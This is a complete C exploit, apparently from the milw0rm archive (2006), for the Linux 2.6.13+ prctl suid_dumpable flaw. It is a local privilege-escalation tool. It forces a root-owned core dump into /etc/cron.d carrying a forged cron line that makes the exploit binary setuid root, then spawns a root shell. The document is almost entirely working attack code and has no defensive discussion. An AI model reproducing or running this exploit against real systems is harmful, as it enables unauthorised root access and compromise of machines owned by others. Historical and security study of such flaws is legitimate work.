Linux >= 2.6.13 prctl kernel exploit

1. /* Linux >= 2.6.13 prctl kernel exploit
2.  *
3.  * (C) Julien TINNES
4.  *
5.  * If you read the Changelog from 2.6.13 you've probably seen:
6.  *  [PATCH] setuid core dump
7.  *
8.  * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
9.  * user setable argument to PR_SET_DUMPABLE.
10.  *
11.  * This flaw allows us to create a root owned coredump into any directory.
12.  * This is trivially exploitable.
13.  *
14.  */
15.  
16. #include <sys/types.h>
17. #include <sys/time.h>
18. #include <sys/resource.h>
19. #include <sys/prctl.h>
20. #include <unistd.h>
21. #include <stdio.h>
22. #include <errno.h>
23. #include <signal.h>
24. #include <stdlib.h>
25. #include <time.h>
26.  
27. #define CROND "/etc/cron.d"
28. #define BUFSIZE 2048
29.  
30.  
31. struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
32.  
33. char    crontemplate[]=
34. "#/etc/cron.d/core suid_dumpable exploit\n"
35. "SHELL=/bin/sh\n"
36. "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
37. "#%s* * * * *   root     chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
38.  
39. char    cronstring[BUFSIZE];
40. char    fname[BUFSIZE];
41.  
42. struct timeval te;
43.  
44. void sh(int sn) {
45.     execl(fname, fname, (char *) NULL);
46. }
47.      
48.  
49. int main(int argc, char *argv[]) {
50.  
51.     int nw, pid;
52.  
53.     if (geteuid() == 0) {
54.         printf("[+] getting root shell\n");
55.         setuid(0);
56.         setgid(0);
57.         if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
58.             perror("[-] execle");
59.             return 1;
60.         }
61.     }
62.  
63.     printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");
64.  
65.     /* get our file name */
66.     if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
67.         perror("[-] readlink");
68.         printf("This is not fatal, rewrite the exploit\n");
69.     }
70.  
71.     if (signal(SIGUSR1, sh) == SIG_ERR) {
72.         perror("[-] signal");
73.         return 1;
74.     }
75.     printf("[+] Installed signal handler\n");
76.  
77.     /* Let us create core files */
78.     setrlimit(RLIMIT_CORE, &myrlimit);
79.     if (chdir(CROND) == -1) {
80.         perror("[-] chdir");
81.         return 1;
82.     }
83.  
84.     /* exploit the flaw */
85.     if (prctl(PR_SET_DUMPABLE, 2) == -1) {
86.         perror("[-] prtctl");
87.         printf("Is you kernel version >= 2.6.13 ?\n");
88.         return 1;
89.     }
90.  
91.     printf("[+] We are suidsafe dumpable!\n");
92.  
93.     /* Forge the string for our core dump */
94.     nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
95.     if (nw >= sizeof(cronstring)) {
96.         printf("[-] cronstring is too small\n");
97.         return 1;
98.     }
99.     printf("[+] Malicious string forged\n");
100.  
101.     if ((pid=fork()) == -1) {
102.         perror("[-] fork");
103.         return 1;
104.     }
105.  
106.     if (pid == 0) {
107.         /* This is not the good way to do it ;) */
108.         sleep(120);
109.         exit(0);
110.     }
111.  
112.     /* SEGFAULT the child */
113.     printf("[+] Segfaulting child\n");
114.     if (kill(pid, 11) == -1) {
115.         perror("[-] kill");
116.         return 1;
117.     }
118.     if (gettimeofday(&te, NULL) == 0)
119.         printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
120.     sleep(120);
121.  
122.     printf("[-] It looks like the exploit failed\n");
123.  
124.     return 1;
125. }
126.  
127. // milw0rm.com [2006-07-12]